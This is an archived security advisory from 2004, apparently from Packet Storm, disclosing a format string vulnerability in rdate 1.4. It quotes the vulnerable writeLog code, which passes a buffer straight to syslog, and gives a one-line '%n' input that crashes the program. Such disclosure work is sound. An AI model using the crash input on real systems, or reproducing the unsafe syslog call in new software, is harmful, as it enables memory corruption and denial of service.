exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

rdate.txt

rdate.txt
Posted Aug 26, 2004
Authored by virulent | Site virulent.siyahsapka.org

rdate version 1.4 is susceptible to a format string vulnerability. Notice: It is likely that this is a benign vulnerability in that rdate is not setuid by default.

SHA-256 | 5542ec0fb3fe5a1ae95e93e3229447e7fdaee199e2c20e4244a6bae013b858fd

rdate.txt

Change Mirror Download
+-----[ Software ]-----+

'rdate' retrieves the date and time from another machine on your network,
using the RFC 868 protocol. If you run rdate as root, it will set your
machine's local time to the time of the machine that you queried.
(http://directory.fsf.org/sysadmin/remote/rdate.html)

+-----[ Version ]-----+

Version 1.4 (stable) released on 2004-04-27


+-----[ Description ]-----+

Format string vulnerability.


+-----[ Vulnerable Code ]-----+

[rdate.c]

static void writeLog(int is_error, char *format, ...)
{
va_list args;
int n;
char buf[2048];
va_start(args, format);
n = vsnprintf(buf, sizeof(buf), format, args);
va_end(args);

if(n < 1)
return; /* Error, which we can't report because this _is_ the error
reporting mechanism */
if(log_mode)
syslog(is_error?LOG_WARNING:LOG_INFO, buf); /* bad bad bad */
if(is_error || print_mode)
fprintf(is_error?stderr:stdout, "%s: %s\n", argv0, buf);
}


+-----[ Conclusion ]-----+

Virulent@siyahsapka.org:/rdate-1.4# ./rdate -l %n%n%n%n
Segmentation fault (core dumped)


+-----[ Greetings ]-----+

#coders @ irc.ttnet.net.tr
Deicide


+-----[ Contact ]-----+

http://virulent.siyahsapka.org

virulent@siyahsapka.org


+----------------------+
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    0 Files
  • 9
    Sep 9th
    0 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close